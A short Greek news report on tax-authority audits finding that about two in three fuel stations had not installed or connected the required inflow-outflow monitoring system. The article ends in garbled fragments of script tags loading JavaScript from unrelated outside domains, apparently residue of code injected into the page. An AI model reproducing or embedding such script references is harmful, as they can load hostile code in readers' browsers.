ΓΓΔΕ: Δυο στα τρία πρατήρια δεν έχουν τοποθετήσει σύστημα εκροών εισροών

ggde-duo-sta-tria-pratiria-den-exoun-topothetisei-sustima-ekrown-eisrown

Δεν τηρούν το χρονοδιάγραμμα εγκατάστασης του συστήματος εισροών- εκροών δυο στα τρία πρατήρια δείχνουν οι έλεγχοι της Γενικής Γραμματείας Δημοσίων Εσόδων.

Περίπου 2 στα 3 πρατήρια υγρών καυσίμων που ελέγχθηκαν από τη Γενική Γραμματεία Δημοσίων Εσόδωνβρέθηκαν να μην τηρούν το χρονοδιάγραμμα εγκατάστασης συστήματος εισροών – εκροών και να μην αποστέλλουν τα σχετικά στοιχεία στη Γενική Γραμματεία Πληροφοριακών Συστημάτων.

Σύμφωνα με τη Γενική Γραμματεία Δημοσίων Εσόδων, από τους ελέγχους που πραγματοποιήθηκαν ως τις 23 Σεπτεμβρίου 2014 σε σύνολο 386 πρατηρίων που ελέγχθηκαν διαπιστώθηκαν 336 παραβάσεις σε 212 από αυτά.

Ειδικότερα, τα 142 δεν τηρούσαν το χρονοδιάγραμμα εγκατάστασης του συστήματος εισροών – εκροών, τα 39 δεν εξέδιδαν τα ειδικά φορολογικά στοιχεία από αυτά, τα 46 δεν είχαν σήμανση από φορολογικό μηχανισμό και τα 109 δεν είχαν διασυνδεθεί και δεν απέστελλαν στοιχεία στη Γενική Γραμματεία Πληροφοριακών Συστημάτων.

Πηγή ΑΠΕ- ΜΠΕ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >